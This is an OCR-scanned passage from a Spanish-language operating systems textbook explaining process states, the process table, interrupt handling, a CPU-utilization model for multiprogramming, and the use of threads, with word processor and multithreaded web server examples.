interno, a menudo los procesos necesitan interactuar con otros. Un proceso puede generar cierta sa¬ 
lida que otro proceso utiliza como entrada. En el comando de shell 

cal capitulol capitulo2 capítulos | grep árbol 

el primer proceso, que ejecuta cat, concatena tres archivos y los envía como salida. El segundo pro¬ 
ceso, que ejecuta grep, selecciona todas las líneas que contengan la palabra “árbol”. Dependiendo 
de la velocidad relativa de los dos procesos (que dependen tanto de la complejidad relativa de los 
programas, como de cuánto tiempo ha tenido cada uno la CPU), puede ocurrir que grep esté listo 
para ejecutarse, pero que no haya una entrada esperándolo. Entonces debe bloquear hasta que haya 
una entrada disponible. 

Cuando un proceso se bloquea, lo hace debido a que por lógica no puede continuar, común¬ 
mente porque está esperando una entrada que todavía no está disponible. También es posible que 
un proceso, que esté listo en concepto y pueda ejecutarse, se detenga debido a que el sistema ope¬ 
rativo ha decidido asignar la CPU a otro proceso por cierto tiempo. Estas dos condiciones son com¬ 
pletamente distintas. En el primer caso, la suspensión está inherente en el problema (no se puede 
procesar la línea de comandos del usuario sino hasta que éste la haya escrito mediante el teclado). 
En el segundo caso, es un tecnicismo del sistema (no hay suficientes CPUs como para otorgar a ca¬ 
da proceso su propio procesador privado). En la figura 2-2 podemos ver un diagrama de estados que 
muestra los tres estados en los que se puede encontrar un proceso; 

1. En ejecución (en realidad está usando la CPU en ese instante). 

2. Listo (ejecutable; se detuvo temporalmente para dejar que se ejecute otro proceso). 

3. Bloqueado (no puede ejecutarse sino hasta que ocurra cierto evento externo). 

En sentido lógico, los primeros dos estados son similares. En ambos casos el proceso está deseoso 
de ejecutarse; sólo en el segundo no hay temporalmente una CPU para él. El tercer estado es dis¬ 
tinto de los primeros dos en cuanto a que el proceso no se puede ejecutar, incluso aunque la CPU 
no tenga nada que hacer. 



1. El proceso se bloquea para recibir entrada 

2. El planificador selecciona otro proceso 

3. El planificador selecciona este proceso 

4. La entrada ya está disponible 


Figura 2-2. Un proceso puede encontrarse en estado “en ejecución”, “bloqueado” o 
“listo”. Las transiciones entre estos estados son como se muestran. 


Hay cuatro transiciones posibles entre estos tres estados, como se indica. La transición 1 ocurre 
cuando el sistema operativo descubre que un proceso no puede continuar justo en ese momento. En 
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algunos sistemas el proceso puede ejecutar una llamada al sistema, como pause, para entrar al es¬ 
tado bloqueado. En otros sistemas, incluyendo a UNIX, cuando un proceso lee datos de una cana¬ 
lización o de un archivo especial (como una terminal) y no hay entrada disponible, el proceso se 
bloquea en forma automática. 

Las transiciones 2 y 3 son producidas por el planificador de procesos, una parte del sistema 
operativo, sin que el proceso sepa siquiera acerca de ellas. La transición 2 ocurre cuando el plani¬ 
ficador decide que el proceso en ejecución se ha ejecutado el tiempo suficiente y es momento de 
dejar que otro proceso tenga una parte del tiempo de la CPU. La transición 3 ocurre cuando todos 
los demás procesos han tenido su parte del tiempo de la CPU y es momento de que el primer pro¬ 
ceso obtenga la CPU para ejecutarse de nuevo. El tema de la planificación de procesos (decidir qué 
proceso debe ejecutarse en qué momento y por cuánto tiempo) es importante; más adelante en este 
capítulo lo analizaremos. Se han ideado muchos algoritmos para tratar de balancear las contrastan¬ 
tes demandas de eficiencia para el sistema como un todo y de equidad para los procesos individua¬ 
les; más adelante en este capítulo estudiaremos algunas. 

La transición 4 ocurre cuando se produce el evento externo por el que un proceso estaba espe¬ 
rando (como la llegada de ciertos datos de entrada). Si no hay otro proceso en ejecución en ese ins¬ 
tante, se activa la transición 3 y el proceso empieza a ejecutarse. En caso contrario, tal vez tenga 
que esperar en el estado listo por unos instantes, hasta que la CPU esté disponible y sea su tumo de 
utilizarla. 

Si utilizamos el modelo de los procesos, es mucho más fácil pensar en lo que está ocurriendo 
dentro del sistema. Algunos de los procesos ejecutan programas que llevan a cabo los comandos 
que escribe un usuario; otros son parte del sistema y se encargan de tareas como cumplir con las pe¬ 
ticiones de los servicios de archivos o administrar los detalles de ejecutar una unidad de disco o de 
cinta magnética. Cuando ocurre una interrupción de disco, el sistema toma una decisión para dejar 
de ejecutar el proceso actual y ejecutar el proceso de disco que está bloqueado esperando esta inte¬ 
rrupción. Así, en vez de pensar en las interrupciones, podemos pensar en los procesos de usuario, 
procesos de disco, procesos de terminal, etc., que se bloquean cuando están esperando a que algo 
ocurra. Cuando se ha leído el disco o se ha escrito el carácter, el proceso que espera se desbloquea 
y es elegible para continuar ejecutándose. 

Este punto de vista da pie al modelo que se muestra en la figura 2-3. Aquí el nivel más bajo del 
sistema operativo es el planificador, con un variedad de procesos encima de él. Todo el manejo de 
las interrupciones y los detalles relacionados con iniciar y detener los procesos se ocultan en lo que 
aquí se denomina planificador, que en realidad no es mucho código. El resto del sistema operativo 
está muy bien estructurado en forma de procesos. Sin embargo, pocos sistemas reales están tan bien 
estructurados como éste. 

2.1.6 I mplementación de los procesos 

Para implementar el modelo de procesos, el sistema operativo mantiene una tabla (un arreglo de es¬ 
tructuras) llamada tabla de procesos, con sólo una entrada por cada proceso (algunos autores llaman 
a estas entradas bloques de control de procesos). Esta entrada contiene información importante 
acerca del estado del proceso, incluyendo su contador de programa, apuntador de pila, asignación de 
memoria, estado de sus archivos abiertos, información de contabilidad y planificación, y todo lo de- 
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Procesos 


0 

1 

. . . 

n-2 

n- 1 

Planificador 


Figura 2-3. La capa más baja de un sistema operativo estructurado por procesos se en¬ 
carga de las interrupciones y la planificación. Encima de esa capa están los procesos se- 
cuenciales. 


más que debe guardarse acerca del proceso cuando éste cambia del estado en ejecución a listo o blo¬ 
queado, de manera que se pueda reiniciar posteriormente como si nunca se hubiera detenido. 

La figura 2-4 muestra algunos de los campos clave en un sistema típico. Los campos en la pri¬ 
mera columna se relacionan con la administración de procesos; los otros dos se relacionan con la 
administración de memoria y archivos, respectivamente. Hay que recalcar que los campos conteni¬ 
dos en la tabla de procesos varían de un sistema a otro, pero esta figura nos da una idea general de 
los tipos de información necesaria. 


Administración de procesos 

Administración de memoria 

Administración de archivos 

Registros 

Apuntador a la información 

Directorio raíz 

Contador del programa 

del segmento de texto 

Directorio de trabajo 

Palabra de estado del programa 

Apuntador a la información 

Descripciones de archivos 

Apuntador de la pila 

del segmento de datos 

ID de usuario 

Estado del proceso 

Apuntador a la información 

ID de grupo 

Prioridad 

Parámetros de planificación 

ID del proceso 

Proceso padre 

Grupo de procesos 

Señales 

Tiempo de inicio del proceso 
Tiempo utilizado de la CPU 

Tiempo de la CPU utilizado por 
el hijo 

Hora de la siguiente alarma 

del segmento de pila 



Figura 2-4. Algunos de los campos de una entrada típica en la tabla de procesos. 


Ahora que hemos analizado la tabla de procesos, es posible explicar un poco más acerca de có¬ 
mo la ilusión de varios procesos secuenciales se mantiene en una (o en varias) CPU. Con cada cla¬ 
se de E/S hay una ubicación asociada (por lo general, en una ubicación cerca de la parte 
final de la memoria), a la cual se le llama vector de interrupción. Esta ubicación contiene la di¬ 
rección del procedimiento del servicio de intermpciones. Suponga que el proceso de usuario 3 está 
en ejecución cuando ocurre una interrupción de disco. El contador de programa, la palabra de estado 
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del programa y algunas veces uno o más registros del proceso del usuario 3 se meten en la pila (ac¬ 
tual) mediante el hardware de interrupción. Después, la computadora salta a la dirección especifi¬ 
cada en el vector de interrupción. Esto es todo lo que hace el hardware. De aquí en adelante, 
depende del software y en especial del procedimiento del servicio de interrupciones. 

Todas las interrupciones empiezan por guardar los registros, a menudo en la entrada de la tabla 
de procesos para el proceso actual. Después, se quita la información que la interrupción metió en la 
pila y el apuntador de pila se establece para que apunte a una pila temporal utilizada por el manejador 
de procesos. Las acciones como guardar los registros y establecer el apuntador de pila no se pueden 
expresar ni siquiera en lenguajes de alto nivel tales como C, por lo que se realizan mediante una pe¬ 
queña rutina en lenguaje ensamblador, que por lo general es la misma para todas las interrupciones, 
ya que el trabajo de guardar los registros es idéntico, sin importar cuál sea la causa de la interrupción. 

Cuando termina esta rutina, llama a un procedimiento en C para realizar el resto del trabajo 
para este tipo de interrupción específico (suponemos que el sistema operativo está escrito en C, la 
elección usual para todos los sistemas operativos reales). Cuando ha terminado su trabajo y tal vez 
ocasionando que algún otro proceso esté entonces listo, el planificador es llamado para ver qué pro¬ 
ceso se debe ejecutar a continuación. Después de eso, el control se pasa de vuelta al código en len¬ 
guaje ensamblador para cargar los registros y el mapa de memoria para el proceso que entonces es 
el actual y se empieza a ejecutar. En la figura 2-5 se sintetizan el manejo de interrupciones y la pla¬ 
nificación de proceso. Vale la pena recalcar que los detalles varían dependiendo del sistema. 


1. El hardware mete el contador del programa a la pila, etc. 

2. El hardware carga el nuevo contador de programa del vector de interrupciones. 

3. Procedimiento en lenguaje ensamblador guarda los registros. 

4. Procedimiento en lenguaje ensamblador establece la nueva pila. 

5. El servicio de interrupciones de C se ejecuta (por lo general lee y guarda la entrada en el búfer). 

6. El planificador decide qué proceso se va a ejecutar a continuación. 

7. Procedimiento en C regresa al código de ensamblador. 

8. Procedimiento en lenguaje ensamblador inicia el nuevo proceso actual. 


Figura 2-5. Esqueleto de lo que hace el nivel más bajo del sistema operativo cuando 
ocun'e una interrupción. 

Cuando el proceso termina, el sistema operativo muestra un carácter indicador y espera un nue¬ 
vo comando. Cuando recibe el comando, carga un nuevo programa en memoria, sobrescribiendo el 
anterior. 


2.1.7 Modelación déla multiprogramación 

Cuando se utiliza la multiprogramación, el uso de la CPU se puede mejorar. Dicho en forma cruda: 
si el proceso promedio realiza cálculos sólo 20 por ciento del tiempo que está en la memoria, con 
cinco procesos en memoria a la vez la CPU deberá estar ocupada todo el tiempo. Sin embargo, es¬ 
te modelo es demasiado optimista, ya que supone que los cinco procesos nunca estarán esperando 
la E/S al mismo tiempo. 
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Un mejor modelo es analizar el uso de la CPU desde un punto de vista probabilístico. Supon¬ 
ga que un proceso gasta una fracción p de su tiempo esperando a que se complete una operación de 
E/S. Con n procesos en memoria a la vez, la probabilidad de que todos los n procesos estén espe¬ 
rando la E/S (en cuyo caso, la CPU estará inactiva) es Entonces, el uso de la CPU se obtiene 
mediante la fórmula 

Uso de la CPU = 1 - p" 

La figura 2-6 muestra el uso de la CPU como una función de n, a lo cual se le conoce como el gra¬ 
do de multiprogramación. 



Grado de multiprogramación 


Figura 2-6. Uso de la CPU como una función del número de procesos en memoria. 


La figura deja claro que, si los procesos gastan 80 por ciento de su tiempo esperando las ope¬ 
raciones de E/S, por lo menos debe haber 10 procesos en memoria a la vez para que el desperdicio 
de la CPU esté por debajo de 10%. Cuando nos damos cuenta de que un proceso interactivo, que 
espera a que un usuario escriba algo en una terminal, está en un estado de espera de E/S, debe es¬ 
tar claro que los tiempos de espera de E/S de 80 por ciento o más no son poco comunes. Pero in¬ 
cluso en los servidores, los procesos que realizan muchas operaciones de E/S en disco tendrán a 
menudo este porcentaje o más. 

Para obtener una precisión completa, debemos recalcar que el modelo probabilístico que aca¬ 
bamos de describir es sólo una aproximación. Supone en forma implícita que los n procesos son in¬ 
dependientes, lo cual significa que es bastante aceptable para un sistema con cinco procesos en 
memoria, tener tres en ejecución y dos en espera. Pero con una sola CPU no podemos tener tres pro¬ 
cesos en ejecución a la vez, por lo que un proceso que cambie al estado listo mientras la CPU esté 
ocupada tendrá que esperar. Por ende, los procesos no son independientes. Podemos construir un 
modelo más preciso mediante la teoría de colas, pero el punto que queremos establecer (la multi¬ 
programación permite que los procesos utilicen la CPU cuando de lo contrario estaría inactiva) es, 
desde luego, todavía válido, aun si las curvas verdaderas de la figura 2-6 son ligeramente distintas 
de las que se muestran en la figura. 
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Aun cuando el modelo de la figura 2-6 es simple, de todas formas se puede utilizar para reali¬ 
zar predicciones específicas (aunque aproximadas) acerca del rendimiento de la CPU. Por ejemplo, 
suponga que una computadora tiene 512 MB de memoria, de la cual el sistema operativo ocupa 128 
MB y cada programa de usuario ocupa otros 128 MB. Estos tamaños permiten que haya tres pro¬ 
gramas de usuario en memoria a la vez. Con un promedio de 80 por ciento de tiempo de espera de 
E/S, tenemos una utilización de la CPU (ignorando la sobrecarga del sistema operativo) de 1 - 0.8^ 
o de aproximadamente 49 por ciento. Si agregamos 512 MB más de memoria, el sistema puede pa¬ 
sar de la multiprogramación de tres vías a una multiprogramación de siete vías, con lo cual el uso 
de la CPU se eleva hasta 79 por ciento. En otras palabras, los 512 MB adicionales elevarán el ren¬ 
dimiento por 30 por ciento. 

Si agregamos otros 512 MB, el uso de la CPU sólo se incrementaría de 79 a 91 por ciento, 
con lo cual se elevaría el rendimiento sólo en 12% adicional. Utilizando este modelo, el propieta¬ 
rio de la computadora podría decidir que la primera adición es una buena inversión, pero la segun¬ 
da no. 


2.2HILOS 

En los sistemas operativos tradicionales, cada proceso tiene un espacio de direcciones y un solo hi¬ 
lo de control. De hecho, ésa es casi la definición de un proceso. Sin embargo, con frecuencia hay 
situaciones en las que es conveniente tener varios hilos de control en el mismo espacio de direccio¬ 
nes que se ejecuta en cuasi-paralelo, como si fueran procesos (casi) separados (excepto por el espa¬ 
cio de direcciones compartido). En las siguientes secciones hablaremos sobre estas situaciones y sus 
implicaciones. 

2.2.1 Uso de hilos 

¿Por qué alguien querría tener un tipo de proceso dentro de otro proceso? Resulta ser que hay va¬ 
rias razones de tener estos miniprocesos, conocidos como hilos. Ahora analizaremos algunos de 
ellos. La principal razón de tener hilos es que en muchas aplicaciones se desarrollan varias activi¬ 
dades a la vez. Algunas de ésas se pueden bloquear de vez en cuando. Al descomponer una aplica¬ 
ción en varios hilos secuenciales que se ejecutan en cuasi-paralelo, el modelo de programación se 
simplifica. 

Ya hemos visto este argumento antes; es precisamente Injustificación de tener procesos. En vez 
de pensar en interrupciones, temporizadores y conmutaciones de contexto, podemos pensar en pro¬ 
cesos paralelos. Sólo que ahora con los hilos agregamos un nuevo elemento; la habilidad de las en¬ 
tidades en paralelo de compartir un espacio de direcciones y todos sus datos entre ellas. Esta 
habilidad es esencial para ciertas aplicaciones, razón por la cual no funcionará el tener varios pro¬ 
cesos (con sus espacios de direcciones separados). 

Un segundo argumento para tener hilos es que, como son más ligeros que los procesos, son mas 
fáciles de crear (es decir, rápidos) y destruir. En muchos sistemas, la creación de un hilo es de 10 a 
100 veces más rápida que la de un proceso. Cuando el número de hilos necesarios cambia de ma¬ 
nera dinámica y rápida, es útil tener esta propiedad. 
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Una tercera razón de tener hilos es también un argumento relacionado con el rendimiento. Los 
hilos no producen un aumento en el rendimiento cuando todos ellos están ligados a la CPU, pero 
cuando hay una cantidad considerable de cálculos y operaciones de E/S, al tener hilos estas activi¬ 
dades se pueden traslapar, con lo cual se agiliza la velocidad de la aplicación. 

Por último, los hilos son útiles en los sistemas con varias CPUs, en donde es posible el verda¬ 
dero paralelismo. En el capítulo 8 volveremos a ver esta cuestión. 

Es más fácil ver por qué los hilos son útiles si utilizamos ejemplos concretos. Como primer 
ejemplo considere un procesador de palabras. Por lo general, los procesadores de palabras muestran 
el documento que se va crear en la pantalla exactamente como aparecerá en la página impresa. En 
especial, todos los saltos de línea y de página están en sus posiciones correctas y finales, de mane¬ 
ra que el usuario pueda inspeccionarlas y cambiar el documento si es necesario (por ejemplo, para 
eliminar viudas y huérfanas, líneas superiores e inferiores incompletas que se consideran estética¬ 
mente desagradables). 

Suponga que el usuario está escribiendo un libro. Desde el punto de vista del autor, es más fá¬ 
cil mantener todo el libro en un solo archivo para facilitar la búsqueda de temas, realizar sustitucio¬ 
nes globales, etc. También, cada capítulo podría estar en un archivo separado; sin embargo, tener 
cada sección y subsección como un archivo separado puede ser una verdadera molestia si hay que 
realizar cambios globales en todo el libro, ya que entonces tendrían que editarse cientos de archi¬ 
vos en forma individual. Por ejemplo, si se aprueba el estándar xxxx propuesto justo antes de que 
el libro vaya a la imprenta, todas las ocurrencias del “Estándar xxxx en borrador” tendrían que cam¬ 
biarse por “Estándar xxxx” a última hora. Si todo el libro está en un archivo, por lo general un so¬ 
lo comando puede realizar todas las sustituciones. Por el contrario, si el libro está esparcido en más 
de 300 archivos, cada uno se debe editar por separado. 

Ahora considere lo que ocurre cuando el usuario repentinamente elimina un enunciado de la 
página 1 de un documento de 800 páginas. Después de revisar que la página modificada esté co¬ 
rrecta, el usuario desea realizar otro cambio en la página 600 y escribe un comando que indica al 
procesador de palabras que vaya a esa página (posiblemente mediante la búsqueda de una frase que 
sólo esté en esa página). Entonces, el procesador de palabras tiene que volver a dar formato a todo 
el libro hasta la página 600 en ese momento, debido a que no sabe cuál será la primera línea de la 
página 600 sino hasta que haya procesado las demás páginas. Puede haber un retraso considerable 
antes de que pueda mostrar la página 600 y el usuario estaría descontento. 

Aquí pueden ayudar los hilos. Suponga que el procesador de palabras se escribe como un pro¬ 
grama con dos hilos. Un hilo interactúa con el usuario y el otro se encarga de volver a dar formato 
en segundo plano. Tan pronto como se elimina el enunciado de la página 1, el hilo interactivo indi¬ 
ca al hilo encargado de volver a dar formato que aplique de nuevo formato a todo el libro. Mientras 
tanto, el hilo interactivo sigue esperando las acciones del teclado y del ratón y responde a coman¬ 
dos simples como desplazarse por la página 1, mientras el otro hilo está realizando cálculos inten¬ 
sivos en segundo plano. Con algo de suerte, el proceso de volver a dar formato se completará antes 
de que el usuario pida ver la página 600, para que pueda mostrarse al instante. 

Ya que estamos en ello, ¿por qué no agregar un tercer hilo? Muchos procesadores de pala¬ 
bras tienen la característica de guardar de manera automática todo el archivo en el disco cada 
cierto número de minutos, para proteger al usuario contra la pérdida de todo un día de trabajo en 
caso de un fallo en el programa, el sistema o la energía. El tercer hilo se puede encargar de los 
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respaldos en disco sin interferir con los otros dos. En la figura 2-7 se muestra esta situación con 
tres hilos. 



Figura 2-7. Un procesador de palabras con tres hilos. 


Si el programa tuviera sólo un hilo, entonces cada vez que iniciara un respaldo en el disco se 
ignorarían los comandos del teclado y el ratón hasta que se terminara el respaldo. El usuario sin du¬ 
da consideraría esto como un rendimiento pobre. De manera alternativa, los eventos de teclado y 
ratón podrían interrumpir el respaldo en disco, permitiendo un buen rendimiento pero produciendo 
un modelo de programación complejo, controlado por interrupciones. Con tres hilos, el modelo de 
programación es mucho más simple. El primer hilo interactúa sólo con el usuario, el segundo pro¬ 
ceso vuelve a dar formato al documento cuando se le indica y el tercero escribe el contenido de la 
RAM al disco en forma periódica. 

Debemos aclarar que aquí no funcionaría tener tres procesos separados, ya que los tres hilos 
necesitan operar en el documento. Al tener tres hilos en vez de tres procesos, comparten una me¬ 
moria común y por ende todos tienen acceso al documento que se está editando. 

Hay una situación parecida con muchos otros programas interactivos. Por ejemplo, una hoja de 
cálculo electrónica es un programa que permite a un usuario mantener una matriz, de la cual algu¬ 
nos elementos son datos proporcionados por el usuario. Otros elementos se calculan con base en los 
datos de entrada, usando fórmulas potencialmente complejas. Cuando un usuario modifica un ele¬ 
mento, tal vez haya que recalcular muchos otros elementos. Al tener un hilo en segundo plano que 
realice esos cálculos, el hilo interactivo puede permitir al usuario realizar modificaciones adiciona¬ 
les mientras el cálculo se está llevando a cabo. De manera similar, un tercer hilo se puede encargar 
de los respaldos periódicos al disco por sí solo. 

Ahora considere otro ejemplo más de la utilidad de los hilos: un servidor para un sitio en World 
Wide Web. Las solicitudes de páginas llegan y la página solicitada se envía de vuelta al cliente. En 
la mayoría de los sitios Web, algunas páginas se visitan con más frecuencia que otras. Por ejemplo. 
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la página de inicio de Sony recibe muchas más visitas que una página a varios niveles de profundi¬ 
dad en el árbol que contenga las especificaciones técnicas de cualquier cámara de video. Los servi¬ 
dores Web utilizan este hecho para mejorar el rendimiento, al mantener una colección de páginas de 
uso frecuente en la memoria principal para eliminar la necesidad de ir al disco a obtenerlas. A dicha 
colección se le conoce como caché y se utiliza en muchos otros contextos también. Por ejemplo, en 
el capítulo 1 vimos las cachés de la CPU. 

En la figura 2-8(a) se muestra una forma de organizar el servidor Web. Aquí un hilo, el despa¬ 
chador, lee las peticiones entrantes de trabajo de la red. Después de examinar la solicitud, seleccio¬ 
na un hilo trabajador inactivo (es decir, bloqueado) y le envía la solicitud, tal vez escribiendo un 
apuntador al mensaje en una palabra especial asociada con cada hilo. Después, el despachador des¬ 
pierta al trabajador inactivo y lo pasa del estado bloqueado al estado listo. 


Proceso del servidor Web 



de red 


V Espacio 
Ade usuario 


Espacio 
de kernel 


Figura 2-8. Un servidor Web con múltiples hilos. 


Cuando el trabajador se despierta, comprueba si la petición se puede satisfacer desde la ca¬ 
ché de páginas Web, a la que todos los hilos tienen acceso. De no ser así, inicia una operación 
read para obtener la página del disco y se bloquea hasta que se complete la operación de disco. 
Cuando el hilo se bloquea en la operación de disco, se selecciona otro hilo para ejecutarlo, posi¬ 
blemente el despachador, para adquirir más trabajo o tal vez otro trabajador que queda listo para 
ejecutarse. 

Este modelo permite escribir en el servidor en forma de una colección de hilos secuenciales. 
El programa del despachador consiste en un ciclo infinito para obtener una petición de trabajo y 
enviarla a un trabajador. El código de cada trabajador consiste en un ciclo infinito que se encarga 
de aceptar una petición del despachador y comprobar la caché de páginas Web para ver si la pági¬ 
na está presente. De ser así, se devuelve al cliente y el trabajador se bloquea para esperar una nue¬ 
va petición. 
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En la figura 2-9 se muestra un bosquejo del código. Aquí, como en el resto de este libro, se su¬ 
pone que TRU E es la constante 1. Además, buf y pagina son estructuras apropiadas para contener 
una petición de trabajo y una página Web, respectivamente. 


while (TRUE) { while (TRUE) { 

obtener_siguiente_peticion(&buf); esperar_trabajo{&buf) 

pasar_trabajo(&buf); buscar_pagina_en_cache{&buf,&pagina); 

} if {pagina_no_esta_en_cache(&pagina)) 

leer_pagina_de_disco(&buf, &pagina); 
devolver_pagina{&pagina); 

} 

(a) (b) 


Figura 2-9. Un bosquejo del código para la figura 2-8. (a) Hilo despachador, 
(b) Hilo trabajador. 


Considere la forma en que podría escribirse el servidor Web sin hilos. Una posibilidad es ha¬ 
cer que opere como un solo hilo. El ciclo principal del servidor Web recibe una petición, la exa¬ 
mina y la lleva a cabo hasta completarla antes de obtener la siguiente. Mientras espera al disco, el 
servidor está inactivo y no procesa otras peticiones entrantes. Si el servidor Web se está ejecutan¬ 
do en una máquina dedicada, como es común el caso, la CPU simplemente está inactiva mientras 
el servidor Web espera al disco. El resultado neto es que se pueden procesar menos peticiones/se¬ 
gundo. Por ende, los hilos obtienen un aumento considerable en el rendimiento, pero cada hilo se 
programa de manera secuencial, en forma usual. 

Hasta ahora hemos visto dos posibles diseños: un servidor Web con multihilado y un servidor 
Web con un solo hilo. Suponga que no hay hilos disponibles, pero que los diseñadores del sistema 
consideran que la pérdida de rendimiento debido a un solo hilo es inaceptable. Si hay una versión 
sin bloqueo de la llamada al sistema read disponible, es posible un tercer diseño. Cuando entra una 
petición, el único hilo existente la examina. Si se puede satisfacer desde la caché está bien, pero si 
no es posible, se inicia una operación de disco sin bloqueo. 

El servidor registra el estado de la petición actual en una tabla y después pasa a obtener el si¬ 
guiente evento. Este puede ser una petición para un nuevo trabajo o una respuesta del disco acerca 
de una operación anterior. Si es un nuevo trabajo, se inicia; si es una respuesta del disco, la infor¬ 
mación relevante se obtiene de la tabla y se procesa la respuesta. Con E/S de disco sin bloqueo, una 
respuesta probablemente tendrá que tomar la forma de una señal o interrupción. 

En este diseño, el modelo de “proceso secuencial” que tuvimos en los primeros dos casos se 
pierde. El estado del cálculo debe guardarse y restaurarse de manera explícita en la tabla, cada vez 
que el servidor cambia de trabajar en una petición a otra. En efecto, estamos simulando los hilos y 
sus pilas de la manera difícil. Un diseño como éste, en el que cada cálculo tiene un estado de guar¬ 
dado y existe cierto conjunto de eventos que pueden ocurrir para cambiar el estado, se conoce como 
máquina de estados finitos. Este concepto se utiliza ampliamente en las ciencias computacionales. 
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Ahora el lector debe tener claro qué ofrecen los hilos; posibilitan el concepto de procesos se- 
cuenciales que realizan llamadas al sistema con bloqueo (por ejemplo, para la E/S de disco) y de to¬ 
das formas logran un paralelismo. Las llamadas al sistema con bloqueo facilitan el proceso de 
programación y el paralelismo mejora el rendimiento. El servidor de un solo hilo retiene la simple¬ 
za de las llamadas al sistema con bloqueo, pero pierde rendimiento. El tercer método logra un alto 
rendimiento a través del paralelismo, pero utiliza llamadas e interrupciones sin bloqueo y por ende, 
es difícil de programar. En la figura 2-10 se sintetizan estos modelos. 


Modelo 

Características 

Hilos 

Paralelismo, llamadas al sistema con bloqueo 

Proceso con un solo hilo 

Sin paralelismo, llamadas al sistema con bloqueo 

Máquina de estados finitos 

Paralelismo, llamadas al sistema sin bloqueo, interrupciones 


Figura 2-10. Tres formas de construir un servidor. 


Un tercer ejemplo en donde los hilos son de utilidad es en las aplicaciones que deben procesar 
cantidades muy grandes de datos. El método normal es leer un bloque de datos, procesarlo y des¬ 
pués escribirlo nuevamente como salida. El problema aquí es que, si sólo hay disponibles llamadas 
al sistema con bloqueo, el proceso se bloquea mientas los datos están entrando y saliendo. Hacer 
que la CPU quede inactiva cuando hay muchos cálculos que realizar es sin duda muy ineficiente y 
debemos evitarlo siempre que sea posible. 

Los hilos ofrecen una solución. El proceso podría estructurarse con un hilo de entrada, un hilo 
de procesamiento y un hilo de salida. El hilo de entrada lee datos y los coloca en un búfer de entra¬ 
da. El hilo de procesamiento toma datos del búfer de entrada, los procesa y coloca los resultados en 
un búfer de salida. El búfer de salida escribe estos resultados de vuelta en el disco. De esta forma, 
todas las operaciones de entrada, salida y procesamiento pueden estar ocurriendo al mismo tiempo. 
Desde luego que este modelo sólo funciona si una llamada al sistema bloquea sólo al hilo que hizo 
la llamada, no a todo el proceso. 

2.2.2 El modelo clásico de hilo 

Ahora que hemos visto por qué podrían ser útiles los hilos y cómo se pueden utilizar, vamos a in¬ 
vestigar la idea un poco más de cerca. El modelo de procesos se basa en dos conceptos indepen¬ 
dientes: agrupamiento de recursos y ejecución. Algunas veces es útil separarlos; aquí es donde 
entran los hilos. Primero analizaremos el modelo clásico de hilos; después el modelo de hilos de Li¬ 
nux, que desaparece la línea entre los procesos y los hilos. 

Una manera de ver a un proceso es como si fuera una forma de agrupar recursos relacionados. 
Un proceso tiene un espacio de direcciones que contiene texto y datos del programa, así como otros 
recursos. Estos pueden incluir archivos abiertos, procesos hijos, alarmas pendientes, manej adores 
de señales, información contable y mucho más. Al reunirlos en forma de un proceso, pueden admi¬ 
nistrarse con más facilidad. 
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El otro concepto que tiene un proceso es un hilo de ejecución, al que por lo general sólo se le 
llama hilo. El hilo tiene un contador de programa que lleva el registro de cuál instrucción se va a 
ejecutar a continuación. Tiene registros que contienen sus variables de trabajo actuales. Tiene una 
pila, que contiene el historial de ejecución, con un conjunto de valores para cada procedimiento al 
que se haya llamado, pero del cual no se haya devuelto todavía. Aunque un hilo se debe ejecutar en 
cierto proceso, el hilo y su proceso son conceptos distintos y pueden tratarse por separado. Los pro¬ 
cesos se utilizan para agrupar los recursos; son las entidades planificadas para su ejecución en la 
CPU. 

Lo que agregan los hilos al modelo de procesos es permitir que se lleven a cabo varias ejecu¬ 
ciones en el mismo entorno del proceso, que son en gran parte independientes unas de las otras. Te¬ 
ner varios procesos ejecutándose en paralelo en un proceso es algo similar a tener varios procesos 
ejecutándose en paralelo en una computadora. En el primer caso, los hilos comparten un espacio de 
direcciones y otros recursos; en el segundo, los procesos comparten la memoria física, los discos, las 
impresoras y otros recursos. Como los hilos tienen algunas de las propiedades de los procesos, algu¬ 
nas veces se les llama procesos ligeros. El término multihilamiento también se utiliza para descri¬ 
bir la situación de permitir varios hilos en el mismo proceso. Como vimos en el capítulo 1, algunas 
CPUs tienen soporte directo en el hardware para el multihilamiento y permiten que las conmuta¬ 
ciones de hilos ocurran en una escala de tiempo en nanosegundos. 

En la figura 2-11 (a) podemos ver tres procesos tradicionales. Cada proceso tiene su propio es¬ 
pacio de direcciones y un solo hilo de control. Por el contrario, en la figura 2-ll(b) vemos un solo 
proceso con tres hilos de control. Aunque en ambos casos tenemos tres hilos, en la figura 2-11 (a) 
cada uno de ellos opera en un espacio de direcciones distinto, mientras que en la figura 2-ll(b) los 
tres comparten el mismo espacio de direcciones. 


Proceso 1 Proceso 1 Proceso 1 



Proceso 



(b) 


Figura 2-11. (a) Tres procesos, cada uno con un hilo, (b) Un proceso con tres hilos. 


Cuando se ejecuta un proceso con multihilamiento en un sistema con una CPU, los hilos to¬ 
man turnos para ejecutarse. En la figura 2-1 vimos cómo funciona la multiprogramación de proce¬ 
sos. Al conmutar de un proceso a otro entre varios procesos, el sistema da la apariencia de que hay 
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procesos secuenciales separados ejecutándose en paralelo. El multihilamiento funciona de la misma 
manera. La CPU conmuta rápidamente entre un hilo y otro, dando la ilusión de que los hilos se eje¬ 
cutan en paralelo, aunque en una CPU más lenta que la verdadera. Con tres hilos limitados a cálculos 
en un proceso, los hilos parecerían ejecutarse en paralelo, cada uno en una CPU con un tercio de la 
velocidad de la CPU verdadera. 

Los distintos hilos en un proceso no son tan independientes como los procesos. Todos los hi¬ 
los tienen el mismo espacio de direcciones, lo cual significa que también comparten las mismas va¬ 
riables globales. Como cada hilo puede acceder a cada dirección de memoria dentro del espacio de 
direcciones del proceso, un hilo puede leer, escribir o incluso borrar la pila de otro hilo. No hay pro¬ 
tección entre los hilos debido a que (1) es imposible y (2) no debe ser necesario. A diferencia de te¬ 
ner procesos diferentes, que pueden ser de distintos usuarios y hostiles entre sí, un proceso siempre 
es propiedad de un solo usuario, quien se supone que ha creado varios hilos para que puedan coo¬ 
perar, no pelear. Además de compartir un espacio de direcciones, todos los hilos pueden compartir 
el mismo conjunto de archivos abiertos, procesos hijos, alarmas y señales, etc., como se muestra en 
la figura 2-12. Por ende, la organización de la figura 2-11 (a) se utilizaría cuando los tres procesos 
no estén esencialmente relacionados, mientras que la figura 2-1 l(b) sería apropiada cuando los tres 
hilos en realidad formen parte del mismo trabajo y estén cooperando en forma activa y estrecha en¬ 
tre sí. 


Elementos por proceso 

Elementos por hilo 

Espacio de direcciones 

Contador de programa 

Variabies globales 

Registros 

Archivos abiertos 

Pila 

Procesos hijos 

Estado 
